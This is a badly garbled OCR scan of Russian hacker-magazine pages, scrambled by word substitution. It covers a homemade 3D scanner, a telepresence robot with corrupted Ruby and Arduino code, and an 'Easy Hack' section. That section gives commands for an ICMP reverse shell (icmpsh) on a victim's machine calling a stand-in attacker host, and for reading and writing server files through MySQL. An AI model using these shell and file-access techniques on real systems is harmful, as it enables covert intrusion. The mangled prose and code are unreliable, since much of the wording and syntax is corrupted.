Проц е ссска нир ова ни ваш покорный слуга н ачинается п осленажатиякно п ки « Старт ~ Н е­
дозор имо вести в области объекту лучом вниз-вверх до некоторой степени раз, воеже
список после веб-камеру считала п араметры об ъе кта . Тутесть
капитальный моме нт : н быстро н по отношению п оворачива ть гроздь не без; лазером, а никак не в рассуждении пульт крутить

руку! Скорость н е важна, так н е старайся д ела ть э в таком случае оче нь б ы ст р что до . При
скани ровании мы чащ сделал м насчёт тр е л безграмотный получи и распишись объект, а для экран, гл моя персона дя, в духе пр о­
гр амма а нализир бакс тф что до рм у пр е дм ета, вырисовывая для как ране цветны е

-

линии. Смотреть возьми удивительно ран удовлетворительно обнее п насчёт дв да мозгу мало причинам . Во-первых, если бы

ЕСЛИ ТЫ НЕ ХОЧЕШЬ УТРУЖДАТЬ СЕБЯ И ТЕБЕ НЕ ЖАЛКО

с--1
Настраиваемсканер

036

$500, МОЖЕШЬ ПРИОБРЕСТИ DAVID-LASERSCANNER
STARTER-КIT, КОТОРЫЙ СОДЕРЖИТ И ЛАЗЕРНЫЙ МОДУЛЬ,
ИВЕБ-КАМЕРУ LOGITECH PRO 0000, И КАЛИБРОВОЧНЫЙ
УГОЛ, И USВ-ФЛЕШКУ С ПРОГРАММОЙ.

ХАКЕР

00 / 053/201 0

0D-сканер ради $30

Промежуточный результатсканирован равно моя персона

Самодельный 0D-сканер позволяетполучить приличный эффект

черта лазера отнюдь не хорэ видна не без; обоих сторон nредмета либо — либо недо ста точ­

nридется вернуться для nр е дыдущий этаn да выполнить фотосканирование

ным будеттриангуляционный угол, nрограмма мгновенно выдаст сооб щение

с тех nоложений объекта, которые дадуттако е n ерек рытие . Выnолнив

lи твоя милость сможе шь сие исnравить!. Во-вторых , стремлять бери лазер утоми­

стыковку интересах всех сканов , жмем бери кноnку << Сшить». В зависимости

тельнодля око иэ.-эа высокого контраста междучерным фоном да

с выбранных настроек чрез неграмотный ско лько секун д я там видно будет эффект

ярким лучом. Пройдя соответственно nредмету лучом вниз-вверх столько, как много

сшивания всех ск анов на единую модель. Жмем кноnку «Сох поранить ».

nотребуется, жмем кноnку « Пауза ». Теnерь дозволительно оставить эффект

Теnерь не запрещается найти работу нашу образец во ZBгush либо — либо Mudbox равным образом дове со ти ее

сканирова ния на индивидуальный обложка не без; nомощью кноnки <<Сохранить» . Есть

предварительно совершенства. Модель готова!

прочий вариант-сразу nередать вид для того nослед ующе го

В nр ограмме Tгiдng les по причине вращению nредмета формирова­

от шивания не без; другими сканами, нажав кноnку « Перенести >>. При нажатии

ние оцифрованной nов ерхности nроис хо дил что касается бы автоматически, сие ее

« П е ренести » скан n ере дается нате не без; ледующий этаn !склейку! лишенный чего со­

nреимуще от тва nеред DAVID "oм. Но по образу бы симпатия справ илась со формиро­

х ранения во файл, только хлещущий этаn наш брат неграмотный nокидаем равным образом можем nовторить

ванием nоверхности во «мертвых» зонах? Д умаю, никоим образом . Либо на сих ме­

сканирование, изменив nоложение объекта !не плюнь и разотри nеред новым

стах да мы вместе с тобой бы nолучили nогр е шно не без; ть . Мы но хо тели nолучить конверсив равно как

ска нированием приняться получи кноnку «Стереть » !. Тут имеет важное значение nони мать: к

можноболееточную.Поэтомудополнительныедействияпосшиванию

соз даниямоделинеоб ходимосделатьнесколькосканов . Дляnростых

сканов будем отсчитывать необ ходимыми издержками.

nредметов тебе короче хватит за глаза nоворачивать объект, наnример, получай

05°. Если nовер хност ь nредмета сложная, ведь nотребуется просмотреть
его от разных сторон да просто-напросто nотом заштуковывать сканы. Ещ е единовластно достопамятный

момент: сканы кровь из носу д олжны nерекрыватьдруг друга, с целью
nрограмме былолегче испытывать их.

0-Й ЭТАП

Сшиваниеформ
Последний стадия nеред nолучением модели-это склейка из ка нов. Если
твоя милость никак не сохранял сканы, а nередавал их нате склейкус nомощью соответ­

ствующей кноnки, так можешь nристуnать ко сшиванию сразу. В nротив­
ном со лучае жмем кноnку«Добавить» равно заг ружаем впереди сохраненные
файлы . Процесс сшивания не грех раздробить сверху банан этаnа: подстыковка

ска нов да по сути дела со шивание. Выбирая nопарно сканы, твоя милость указыва­
ешь nрограмме получи и распишись рецепт стыковки. DAVID сnравляется не без; сим ужас
инда обалденно nри условии, что-нибудь питаться чему стыковаться-сканы

должны nерекрыватьдруг друга. Если лоскуты н е nерекрываются, тебе

Дорабатываем готовую шаблон на 0D-редакторе

ВМЕСТО ЗАКЛЮЧЕНИЯ

ЕСЛИ НЕТ ЛАЗЕРА

Собрать 0D-сканер, каковой короче вручать больше нежели благолепный
результат, в полном смысле слова к тому идет дома. Надеюсь, твоя милость на этом сможешь убе­

диться. К сожалению, ради сканиро вания маленьких объектов la ми
нужно было соз принести объекты на ювелирных изделий! нужна весть
ля 0D-сканирования объекта дозволено быть да не принимая во внимание лазера lя никак не шучу!.

хорошая USВ-камера со ССD-матрицей, которой у меня несть !она доста­

Подойдетnро ек т смо щнойламnой ,светкоторойнужн онаn равить

правильно дорогая!, nозтому мои оnыттак равным образом остался опытом: обратиться

сквозьузкую отверстие нате сканируемый объект. Получим узкую белуюли-

его бери деле чтобы сканирования ювелирных изделий безвыгодный получилось . Но

нию-чем безграмотный снег ла зе р? Правда, nомимо nроектора !который недёшев своевольно

автор этих строк испытал незабываемое удовольствие, nолучая nолноценные моде­

согласно себе! нужна снова равно серьезная оснащение пользу кого удержания nроектора на нужном

ли самых разных объектов из через сканера, кто был собран

nоложении. Это гемор но. Можно nойти через обратного- наnравить красочный

просто сверху коленке. ::Х:

свет, а в области объекту nровестите нью ото натянутой нити: такоетоже nредусмотрено

разработчикамиnрограммы.Взтомсл учаеnро граммаможетинвертировать
обрабатываемую картинку. Однако несколько ми nодсказы вала, аюшки? сие безвыгодный даст
хорошего результата .

ХАКЕР

00/153/2011

037

PHREAKING

Сергейка Cильнoвlp o.kumekay.coml

Видеочатна
колесиках
ДЕЛАЕМ БЮДЖЕТНОГО
РОБОТАТЕЛЕПРИСУТСТВИЯ
ЗА 000 ДОЛЛАРОВ
Боты телеприсутствия- Skуре-фоны получи колеси ­
ках- позволяют торчать во двух местах одно­

В качестве ведущи х колес изрядно эксплуатировать автомобиль к са довы х
тачек alias к тележек изо су п ермаркета. В ни х много раз встречаются
встроен ны е согласно дшипни ки, которые у пр насчёт щ аютзада ч усоз дан ия веду­

временно, нежели могут что надо сберечь пора .

щ ей части . В сё на них хорошо, лишь только расплачиваться в области

Правда, серийные модели стоятот5000долларов,

маховик нимало нео хо та. Есть модифицирование побольше смета ны й- исполь ­

беспричинно аюшки? общепонятность у них ограничена . Но отчаи­

ваться малограмотный стоит, фактически малограмотный любимее нежели вслед 000 долла­
ровты можешьсделать такого робота сам!

000-700 рублей вслед

одно

зовать боковые колесики с целью детски х велосипедов. У ни х равно поперечник
в корне веский -13 см, да ширины на

0,5 см х ватает д ля

надежного

сцепления из полом [даже по мнению ковру ездит безграмотный проскальзывая]. Стоят сии
колеса130 рублейзапар~
Те перь что касается выборе моторов . Робот неграмотный хилый, равно всякими пластиковыми
х лип кими мотор-редукторами изо китайских игрушечных машинок тогда
никак не покончить . Популярный модифицирование пользу кого таких роботов -и спользовать

I!UJ;Uiii•i

вазовскиемоторыдлястеклоподъемниковилистеклоочистителей.

Классно когда-никогда где-нибудьтелеприсутствовать. Н апример, сидетьдома на

Самый внушительный их неправильность на том, что-нибудь они оборудованы червячными

халате со чашечкой ароматного кофеек , а во ду шн ой переговорке поднадоев­

мотор-редукторами, которые никак не имеютобратной рычаги [т. е. н е получится ,

ш его офиса полноте ш ур шать моторами роботтелеприсутствия равно переда­

п окрутив колесо, п ере д ать вра щ ение держи мотор; ко л есо общо само п об

вать коллегам ка ртин ку тв ое го улы бающегося лица . От необходимости

себя п относительно хитрить никак не получится]. Пр равным образом резкихторможениях, когда-никогда инер ц ии

досматривать ради происходящим да уместно включать приманка идеи он, конечно, безвыгодный

на колесе е ще много, а моторуже отключе н , весь шакти пойдет получи и распишись по­

спасет, так комфорта прирастить может. Еще экой робокар поможетобщаться

ломку шестеренок, да целый век они безграмотный проживут. Проблема за бол ьшей части

из любимой , находящейся на другом городе, безусловно равно прибрать вслед за ней, ежели

решаемая-нужно ради сто ровно вливать равно включать мотор, так очищать

сколько . Чтобытакой роботутебя появился, нужно, на первом месте , его собрать:

из-за сии а деньжонки

молчок сси, отдел двигателями, нетбук [мозг, комната да экран], а во­

ное решение: дешевые китайские 02-вольтовые шуруповерты. У ни х

•.,

[600-700 рублей после мотор] равным образом другое, далеко не в меньшей степени элегант-

вторых, н ужнозапро граммировать клиентскую равно серверную ча сть. Но

регулятор планетарный, равно подобного недостатка у него нет. До идеала им

теперьобовсем подробно.

равно как далековато: дольшеде сяти минутнепрерывно да сверху полной скорости

...,

вращаться сии моторы невыгодный смогут -перегреются, однако возьми практике сие да далеко не

нужно, толькоесли далеко не соответственно сыла ть робота на тридевятый магазин. Мощности а

Робота нужноделатьдостаточно крупным равно высоким, дай тебе некто был слой ­

равным образом оборотавуних от головой , круглым счетом в чем дело? прилагаться они будут во щадящем

чивым, а зкран дай тебе был неграмотный крепко нижеуровня глаз. Нести получи и распишись борту

режиме. Плю не без; ш урупаверты продаются со патроном, во котофей орый позволяется сра­

нашему роботу п ри дется тяжеленный сви нцево-кислотный источник

зузакре п итьколесоприпомо щ иболт~чемси льн оу пр ос титьв е ду щую

[оптимальный предпочтение

доза .

02 В, 0 Ач , 000 руб . ] равным образом нетбук, потому-то дебаркадер
00-15 кг [тогда дозволено бросьте равно пару ба н о­

должна выносить нагрузку во

квитанция вместе с насчет х ладным пенящимся квасом с холодильника для нем возить] .

Моторы из колесами пока что надлежит для чем-тоукреплять. Можносо­

взимать коробкудля аккумуляторов, электроники да груза с алюминиевого

Теперьопределимся со в количестве колес. В современномтеле­

роботостроении по последней моде использоватьдвухколесныетележки во стиле

Segway. Сделатьтакую шт уковину вдомашнихусловиях на целом реально,

~-----------------------------------,

"

надовольно му т орно во случае создания крупных роботов. П оэтому автор этих строк

"
serial

предлагаюограничиться паче простым вариантом -д обавить сладкое

Ardulno

опорное колесо. В качестветретьего автомобиль подойдет недорогое [35
руб лей] вращающееся колесикодля мебели . Для особой слой чивости
дополнит зеленая красавица ных колес не грех позаимствовать равным образом два.

038

Схема движения yn равля ющих данны х

ХАКЕР

00/153/201 0

Видеочатнаколесиках

профиля либо дерева . Но лучик ш е посетитьзаднийдвор ближайшего супер­
маркета равным образом подобратьтам тесный пластмассовый чемодан из-под фруктов.
При помощи саморезов можноустановить бери нем нетолстыедеревянные
брусочки, для которым зафиксировать моторы равным образом вспомогательные колеса.

Моторы на шурупавертов имеютспецифическую форму, равным образом побег т а­
навливать их минуя родного кор п уса никак не просто. Решение а баста

наименование

звено

Q1, Q2

IRL530

R1, R2

030

R3, R4

000k

U$1, U$2

MOTOR

банально -доработать фюзеляж шурупаверта ножовкой равно напильни­
килоом да указывать авто на нем . Всю внутреннюю электронику нам
придется пустить получи ветер , оставив едва авто не без; двумя проводами, которые

нужно выгнать открыто с корпуса . Если на твоих шурупавертах перевелся
керамических конденсаторов бери

000 нФ посередь контактами мотора, в таком случае

рекомен д ую их т болт а п рипая т ь: спасет ото помех получи и распишись логике равным образом ее самоп р о­

извольного сброса. Можно около п аятьдва таких конденсатора - средь
контактами мотора равным образом его корпусом, однако пользу кого сего потребуется сверхмощный
нос да аккуратность, чтобы, вместе с одной стороны , прогреть стенки мо­
тора, а от непохожий , никак не сделать пакость пластиковые части. Впрочем, фильтры
можнодобавить равно нате силовую п лату.

СОБИРАЕМ ЗАЩИТНИКА ВСЕЛЕННОЙ

000k

Кроме ящика из моторами нужен сызнова надёжный брусок, получи и распишись котором склифосовский
укреплен стол интересах ноутбука. Оптимальная пикет такая, с намерением
проститутка возвышенность получилась ориентировочно 010 см, -тогда сверху н аутбуке хорэ

Схема

0. Пр что до стей ш ая не без; х е м а со баткак ово й ч асти

рационально равно нанимать да получится безвыгодный не мудрствуя лукаво роботтелеприсутствия , а

полноценноерабочеемест~котороевсостоянииследоватьзатобой
повсюду. Столикдля н аутбука не возбраняется проделать изо куска оргстекла

[размером будто со карточка А4), а бронировать сверху стальные уголки около
помощи болтов сиречь вытяжных заклепок. Всё, что-то малограмотный закреплено само­
резами: моторы, платы, для вода, аккумулятор, -удобно врезать
быть помощи нейлоновых стяжек. Способ дешёвый да как нельзя больше сер­

дитый . Конечно, моторы от колесами за такого крепления придется

отметка

тонкость

С13

00пF

С1-С3,С5-С10

000uF/25V

С4,С 0 0,С12

000u F/25V

013

0 N4007

01-013

0 N5819

JP1

Oata

много раз с п равля т ь держи развал-схож д ение .

вносим интеллект
Теперь нужно создатьэлектронную да программную части . В общем, схематическое изображение
такова: в удаленном клиенте, какой соединяется от совместно от WiFi-

не в таком случае — не то 0G-модем, запущена оборона грамма, которая читаетнажатия стрелочек

получи клавиатуре да подле п омо щ равно ХМ РР [ так GTalk"a) п ередаетсо­
общения со у п равляющими коман д ами в сервер, которым является возьми ш
робот. Там вновь одиночный управляю щ ий скриптотлавливаетэти сведения равно

Q1-Q8

IRF1310

R1-R8

060R

··------·---··-

U$1-U$4

IR2110N

Х1

Мотор

Х2

П итание

Х3

Мотор 0

записывает их во несуществующий СОМ-порт, каковой создандгduiпо. Дальше
ардуиноотправляетсигналы получай силовую плату, которая непосред­

ственноуправляетмоторами . Именноеесейчасирассмотрим.Моторот

шурупаверта на моментстарта потребляетболь ш е 00А, а закачаешься времена работы
плохо-плохо 0Апостоянно . Управля т ь т акой мо щ утнапиштим штукойудобнолибо не без;

0

через реле [ да на них самих придется городитьсхему включения),
либо полевыми транзисторами. Для альфа и омега разберем самый бесхитростный

вариант[схем а 0), который-нибудь позволит свободно вращаться колесам,
притом не без; разной скоростью. Еще плюс-для этой схемы нужно решительно

немногодеталей, равно сосредоточить ее не запрещается сверху макетной плате [только невыгодный насчет ­

.~~
~~~

поплавок скликать ее для беспае ч утнапиштим макетке-она неграмотный выдержиттаких токов) .
Главный н едостатоктакой схемы-крутиться кар смогуттолько во
одну сторону, а значит, роботупотребуется пространстводля маневров­
поворот бери месте чтобы него недоступен .

Основа этой схемы-полевойтранзистор [Q1, Q2) IRL530. Позаявле­
нию производ ителя, симпатия можетоткрываться ото логическогоуровня на

0 В,

какой-никакой д ает выходардуи н о. Чтобы проверять моторами плавно, будем

предлагать н а н их Ш ИМ-си г нал. ВШ ИМ-режиме пай времени размер выработки
включен, время т ь выключен, же вереднем nолучается, как выходвключен
далеко не п алной мо щ ностью. Переключения с состояния на накопления проис ­

ходяте частотой во до некоторой степени килогерц, равным образом стушевка куда качествен­

~~~~
~~~~
IR21 00

·~~~
~~
G ·~V

0QuH2~V

ное. По идее, всёдолжно бытьхорош о, истинно воттолько слабенькийток через
микроконтроллера оченьдолго открываетза т вортранзистора, благодаря тому

получается, зачем большую дробь временитранзистор проводит на полуот­
крытом состоянии, когд а его со п ротивление велико, а гумно посредством него

невыгодный мал. В результате получи и распишись транзис т орах можножарить яичницу, правда,

недолго: мои п осле пяти минутработы робота сгорели вовсе. Возможно,
самое лучшее хорош работатьдругой распространенный транзистор-еуправлением

ХАК Е Р

00/153/2011

Сх е м а 0.П ол н оце н ны й Н -м касательно ст

039

~HREAKING

Материалы ради ноги

Ведущая пакет

Электроника робота

л огическим уровнем- RFPЗON06LE производства Faiгchild, тот или иной

порт. Форматкомандтоже невыгодный из лож е н-два числа отО впредь до 055, сквозь для ­

можетуправляться равно уров н ем вЗ,З В.

бел. Каждое число-значение, бери выходе ШИМ-255 максимальная

Н оеслиужзаморачиватьсястакимроботом,можносделатьвсi п насчёт

со корость, О-остановка.

максимуму равным образом отстроить полновесный Н-мост[схема21 , пользу кого которого схватить

_ _ _ _ _ _ _ _ ___

MOSFET"ы помощнее, так IRF131 0-с рабочимтоком на 02А. У такого

Код~рвеg~а

транзи сто р а пусть даже около пуске мотора будет4-кратный репертуар по части мощности,

require " rubygems"
require "xmpp4r-simple "
require " serialport "
# проиницыализировали однако библиотеки
sp=Serialf>_o_r_t_.лe_w_"Ldev/ttyUSB8_",,_9
""б
""e""e,__ _ _ _ __
# открыли после,(l,овательный пор"т_ _ _ _ _ _ _ _ _ _ __
im=Jabber : _____
# соединились вместе с Jabber"oм
while (true ) do
# равно давно бесконечности
im.received_messages do JmessageJ

по правилам безграмотный сгорит. А так чтобы возлюбленный открывался подробно из тью равно реализовывал всё
близкий ресурсы , приводить им будетспециальный полумо сто войдрайвер

IR2110. Н мостпозволитколесам быть принятым на обе стороны, а защи щенн ая
карта будетработатьстабильно да лишенный чего пер е гр ева. Собратьего изрядно

сложнее-деталей стократ значительнее [таблица21 , счета из-за щитны хдиодов
да фильтрующих конденсаторов. На макеткетакую платусделать е щ е воз­
можно, только пр что до щ е будетвытравитьдля никак не е из п е циальн ую плату. Сделать ее
под своей смоковницей можно, например, рядом помощи фоторези ста, хотя сие тм ет од удобен,
всего лишь разве платы быть ходится готовить сплошь и рядом . Для разового применения

попроще воспользоватьсяЛУТ- лазерно-утюжнойтехнологией [по ссылке

обучающее ей видео goo.gl/r1sг l.
П осле того как бы силовая делянка сделана, ее нужно отвести для

Aгduiпo . В случае первой схемы их хорош всеготри -дв а ко ШИМ­
ваша сестра хо дам 0О равно 01 да единолично для земле. С железом покончено. Теп е рь дзерури об
управляющем софте.

МЫСЛИТЕЛЬНЫЙ ПРОЦЕСС

# п~ряем пришедшие сооб~. ~
еu
н~
ия~-------------рuts "#{message . body"}_
" _ __
а,Ь=message.body.split(" " )
# разбираем, даже если несколько пришло
sp.write a.to_i.chr+b.to_i.chr
# равно записываем на пристань
# нехай кон:rроллер разбирается

Видеоаудиоданные во системе передаются самосильно ото управления.

епd

Городить собственную систему т елеконференций ради телебота бес­
смысле нно. Можнозапросто использоватьSkуре или — или видеочатGооglе,

sleeg e. es_____
# капелька спустя

обаоникроссплатформенны,поэтомувсяпрограммнаячастьможетбыть

епd

всё опять двадцать пять

орга ни зована лещадь Ubuntu. В скайпеудобно n кончить на настройках галоч­

ку << Автоматически отзываться в бис >>, с намерением позволяется было nодключиться

Запуститьэтотскриптпростокомандой

ко роботу во все в равной степени кто момент.
Теперьуправляющий софт. На м nонадобится серверная равным образом клиент­

ruby telebot.server. rb

ская ча не без; тьдля РС равным образом проши вкадляд гduinо. Уnравляющиескрипты будем

nисать бери RuЬуnодуnравлением Ubuntu [никаки х х итрых библиотек во
скриптах безграмотный используется , равным образом онидолжны нести протоколы и заботы да во среде Windows, да на

среде Cygwinl. На обоих машинахставим интерпретатор:

Помимо руби, понадобится покамест равным образом п ара библиотек нате клиенте для того

р аботы сJаЬЬег"ом:

sudo gem install xmpg4r-simp_le._ _ __

ТЕЛЕБОТ НАПРОКАТ

D

е ли хоче шь подвергнуть проверке учуять
себя на шк уре робота , так д ела ть свое го
телебота совсем н е н олигодон н относительно . Можно позаимствовать

одного напрокат. Например, рюха улярного доволь­

однако равно з ве от тного российского RBot"a [ tеlеdго i ds . гu l­
На сервере, не беря в расчет нее, понадобится сызнова да здание работы со по­
из ледовательным портом :

ведрообразного робота от адски передвижной шеей
равно доброжелательным выражением лица, хоть некто
создан во основном для того рекламных целей . Для

sudo gem install xm pp4r-simple ruby-serialport

веселого времяпровождения не возбраняется рисковать
побольше аркадный вариант: сообразно игратьвшутер ото

У стих се рвера простая следовать дача-п олучитьуправляющую команду

поJаЬЬе~уиото из латьеемикроконтроллеручерезпоследовательный

лица робота [ гobot - waг. гu l сиречь погонятьпопарку
возьми реальных машинках [ g l avbot. г u l

RBot- русскийтелебот

ХАКЕР

00 / 053/2011

Видеочат получи колесиках

По слетого во вкусе экипаж отослана для контроллеру, ее нужно покупать равно
тамуже положить в бумагу соответствующие значения во ножку.

БАЛАНСИРУЮЩИЙ

Arduino
int lPin=10; // Левый моторчик
int rPin=11; 01 Правый движок
int command=В ;
void setug( l_{______________________________
~i al . b_
egin(9600);_}_______________________________
void loop() {
if (Serial.availaЫe() > 0) {

ДВУХКОЛЕСНЫИ РОБОТ

/1

да , сии микросхемы на безобразно а мелких корпусах, от которыми работатьдома

Скетч к

читаем команду правого мотора

для того измерения круговой скорости отклонения (чтобы понять, рано или поздно

электронный человек н ачнет заваливаться! да акселерометр, воеже знать, во какую сторону на­
правленагравита ция ,ико рректироватьпоказаниягироскопа.Выпускаются ,

ото компании Spaгkfun (гироск оп spaгkfun . com/pгoducts/9059 да акселерометр

пиш ем для оманлу_п равого мото р~

_analogWci:t~(rPin,

command)_;,_____~--------------------Serial.println(command, DEC)_;___

01

л еснаяробопла тформа ,ккоторойнеобхо димодобавитьгиро ско п

под невозможно, в области этом у прощ е употребить DIР-модулями , как-то

command=Serial.read();

LJ

ч

ведь бы сдела ть балансирующего робота, нужна простая дву хко ­

spaгkfun.com/pгoducts/844 0 . В качестве элементы позволительно занять файлы проекта
AгduRolleг ( github . com/fasaxc/AгduRolleгJ-тaм ранее ест ь отделанный адрес равным образом схемы.

читаем команду левого мотора

command=Serial.read();

01

з аписываем команду лево го мотора

analogWrite(lPin, command)_;___
Serial. RI"intln(command, DEC)_;
LL во те чение 000 мс м оторь!J9:1УIRкя__
delay(300);}

0/ nото м

gruL
!разбираем~я~~очитанными клавишами

через ко лючают из ваш покорнейший слуга

// равным образом ж дут новы х жерлянка з аний

analogWrite_(rPin, 0);
analogWritg_(],Pin, 0)_; }_____________________
Благодарятакому простомуформатупередачи сообщенийсерверу
клиентамож нонепи сатьиво на с~п ро стосидив чатикедап ере писывайся
от роботом. Такой вариант, конечно, малоудоб е н, поэтомуеще единодержавно ск рипт,
какой-никакой будетчитать нажатия клавиш клавиатуры равным образом отправлять коман ды

соответственно джабберу.
П онимать симпатия будеттри стрело чки, а в свою очередь цифры с 0 прежде

0, которые

задают скорость. В скрипте используется н ебол ьш ее контингент магии,

которая позволяеткон сольца ному приложению разбирать возьми жатия клавиш минус
подтверждения клавишей Enteг.

____
require "ruby_g..,
em,."s,_"____

Код клиента

"xmpp4r - simpl~
e_
" ___________________________
055/ 0_ _
@im=Jabber: :Simple.new( "pass" )
@
# читаем для лавиши кроме сверху жатия Enter
def read_!Jlill:_

def show_single key___________________________________
. с=read_char
case вместе с
# за в ж атию ко нопки отсылае м уведомление
when " \е[А"
_guts @ "
when " ".е [С_
puts "Наnраво"
@recipient, "0
when "\e[D"
guts " Налево"
deliver_(@r_ecigient, t _o_s+" 0" ),_____________________
ltiJ!t ФRЫ через 0 вплоть до 0_о_п_ре~ют ско"J,р",
о",
с"""
т,.
ь _______________________
when "1"
puts "1"
@а=255/ 0
when "2"
_puts "2"

Leq~ire

_@a=255 * 0/3~------------------------------------­

@а=

when "3"
puts "3"
@а=255
# сообразно esc прикрываем
when "".е "
Proces s.exit
end

~g~
i n~-------------------------------------------

____________________________________
old_state="stty -g"
system "stty raw -echo"
с=STDIN.getc.chr
if (c==":.~~)_ _
exj: са _thread=Th r_ea_d. new{ _____________________________
с-=_с + STDIN.getc .chr
________________________________
с=с+ STDIN.getc.chr

# мa г ия начинает вместе с я.___

лавоч ко у

!illQ___
#запускаем прослушку впредь до ко онца времен

show_single_key while (true)
Все готово! Запускаем заборщик да сервер равно катаемся объединение квартире. Потом
не возбраняется пр овести равно ул ичные испытания-общаясьсослегка изумленными
ради хожи ми .

}

extra_t hread .join (0. 00001)
extra_thread.kill
_______________________________________________

КУДА КАТИТЬСЯ ДАЛЬШЕ?
Сколько сие стои ло? Нателе жку не без; моторами, аккумуляторами да прочим

_en~
d

уш ло неграмотный больше 000долларов, нетбук автор этих строк брал свой, да после парусотенточно

rescue -> ех
_ gutL1t{ex.class}: #{ex.message}"
puts ex.backtrace
ensure
system "stty #{old_state}"
end _________
r eturn от
# м а гия_КQ_Нча е тся _______________________________________

дозволено прио брес ти одинаковый чуть-чуть подержанный. Ителеприсутству ­

ХАКЕР

00/153/2011

вать во разных местах!

Хотя нате зто м далеко не стоитостанавливаться! Легкозаставить его кататься
повагонамзлектрички,собираяпожертвованиянаразвитиеотечествен­
утнапиштим робототехники, итакокупитьзатраты получи и распишись его постройку. А допускается

найти в него полноценную робооперационкуRОS ( гos . oгg/wiki/ 0,
дать леща разнообразныхдатчиков идавести его соответственно интеллекту доуровня

WillowGaгage PR2I goo.gi/SDгB I иначе говоря

RBot ( г bot.гu l.

::Х:

ВЭЛОМ/ЕАSУНАСК

Тюрин «GreenDog » Алексей,

DSecRG.ru [agrrrdogfiJgmail .co m, twitter.co m/antyurinl

ОРГАНИЗОВАТЬ СКРЫТЫЙ КАНАЛ СВЯЗИ
С КОМПЬЮТЕРОМ ЗА ФАЙРВОЛОМ
сие сообразно сути

back connect, в таком случае преимущество nреодолеть файрвал кардинально

Конечно, самое nростое- сие эабиндить шел л получи каком-нибудь

nовышаются. Во-вторых, равно сие главная фишка, нынешний ш ел л никак не требует

ТСР-nорту сиречь создать

админских nрав: разработчики nотрудились равно малограмотный исnользовали гаw

back connect . Н об что такое? делать, даже если сии

внутренние резервы недостуnны: для бинд-шелла отнюдь не хватит nрав, а исходя­

socket"ы . Итак, юзаем.

щиеТСР-коннектыблокируютсяфайрволом?
В отечественный ем расnоряжении всегда отдельные люди nротоколы, инкаnсулировать

позволено гораздо угодно. Водан иэ отличных вариантов- исnользовать

_ __
icmgsh.exe -t ha.ck.er.ig,___ _ __

У жертвы

ОNS -тун н дерево на варианте, реализованном Алексеем Синцовым [читай
во 047-м выnуске Xl . Но сей дня ми желательно бы оповестить об исnоль­
зова нии шелла, работающего помощью nр отокол

ICM Р, -а буде конкрет­
но, в таком случае в отношении реализации с Вегnагdо Dame le равным образом егодруга Nico : геvегsе icmp
shell . Как однозначно , во данном случае получай клиенте [то поглощать у нашей жер твы !

Имеется небольшую толику настроек клиента , которые выбираются на зави­
симости через н еобходимой скрытнос ти равно скорости канала. Тулза одну каплю
глючит, что-то около зачем некорректные настройки будут чувствительно сказыва ть ся получи
работосnособности .

открывае т ся шел л равным образом вполне его отталкивающийся траффик nихается во nаке-

твоя милость ICMP echo гequest [обычные ping " иl. У нас получи и распишись сервере наша сестра nарсим

У себя

информация входящих заnросов, а во ответных

~Licmpsh_m_,JlY

ICM Р есhо-герlу-nакетах

ha.ck.er.iQ vi . ct . im .ip,___ _ _ _ _ _ _ _ _ __

n ере даем команды клиенту.

В nринциn е, хрия кончено шаблон ная, же эдесь снедать дв е от­

личительные равным образом nриятные на нас насчёт от обенности. Во-nервых, этак что

Здесь автор указываем п относительно очере ди особый

IP да а др yes отечественный ей жертвы,

откудова будут nриходить nинги. Клиентская доза наnисана всего только nод

Windows, что,

во общем-то, логично. Работаетотлично у бесnравных

юзеров , по образу держи ХР, где-то равным образом на 0-ке.
С е рверная делянка реализована махом получи трех языках - Регl, С,

Python . Хотя

да заявлена производство держи всех ОС, да в nрактике нужно nоль­

зова ть ся никсами. Связано сие на правах ми ни мум вместе с тем, сколько n ередза n уском
серверной части никуда не денешься отключить у ОС отве твоя милость возьми входящие

ICM P-ping-зanpocы :
.s.ysctl -w net . igv4.icmg echo ignore ""al""l.,-,..1~-------Еще одна nриятность на том, чтоданный комnлекттеnерь официаль­
же ВХОДИТ В

sqlmap .

Конечно, спастись с такого хека бог nросто: админу полноте
достаточнолишьзаблокировать основывающийся IСМР-трафик . Однако держи
nрактике сие делается до чрезвычайности редко, nоэтомутема короче подвизаться во
Работа IСМР-wелла : сверху-клиент, внизу-сервер

абсолютном большинстве сетей.

ХАКЕР

00 / 053/ 0011

EASY HACK

ПОЛУЧИТЬ ДОСТУП К ФАЙЛОВОЙ СИСТЕМЕ ИЗ MYSQL

• • r.. i!!t.ii
.
АЪТ

создаем таб·л да ц усик по отношению бытие м п олем ти п а longtext. В третьей строке- под­
Сей ч бог блекхатам ч асто н ет см ы сл а лезь на кор п оративную сеть, так-таки

гр ужаем исключительно сколько соз д анный вр еменный обложка на нашу новуютабличку

коренной профит-база данных, которая по большей части «доступна>> сквозь

вместе с учетом разбиения строки за типуокончания строк. В общем, весь логич­

веб-nортал комnании. Сломал сайт- секс учи л прежде сту п ко БД, дальш е

но. При чтении текстовых файлов ото п ер на ого п у нкт а позволительно избавиться.

лезтьобычнонетсмысла.
базу данных, н касательно бери ш а цель-другая налаженность н а томище а хаете . Воттут равным образом

Дл моя особа того воеже следовать 14 сать обложка во ОС, никуда не денешься кто наделен карт-бланш FILE ,
UPDATE, IN SERT, CREATETAB LE . По сути, нам надлежит ранее описан­
ная коман д а SELE CT вместе с указанием INTO DUMPFILE. Сразу отмечу, что-то у

п ояв л яет ся вопрос п олу чить во озмож так сть проводить в жизнь искажение нды во ОС или — или

нас лакомиться реальность только лишь п ереза 14 сывать су щ ествую щишки й файл,

Но эдак случается никак не всегда. Н апример, ситуация: пишущий сии строки поимели какую-то

пусть бы бы дешифрировать файлы. Вт орого д обиться проще, приближенно на правах этотфункцио­

так пустое место невыгодный мешает нам вначале его прочитать, а п отом, добавив домашние

чистоган многократно доступен непривилегированным п ользователям СУБД .

данные, сделать в долг обратно. В сложных случаях , ко гд а нам н еобхо партия что касается

Основной п у ть- употребление функции Loa d_ Fil el!. Для чтения

после ли ть би нарни к, да мы вместе с тобой можем на ос п ользова ть ся со л е дую щей п осле дов а­

необходимы близ вилегии FILE равно CREATETABLE. Кстати, перед виндай

тельностью. Во-первых, победить бинарник получай части на виде hех-строки

шансов получай удачное считывание файлов больше, в такой мере наравне кремастер запускает­

длиной сообразно 0024 байта . Во-вторых, осуществить следую щишки е коман ды :

ся почти привилегированной у ч ет н ой запис ь ю Lo caiSystem. В л уч ш ем
случае, кабы у для вместе с yes ть осуществимость проводить в жизнь постоянство

команд, интересах чтенИ"Я би нарн ого файла потребуется следую щ ий код:

CREATE TABLE writetest(datalongЬlog);
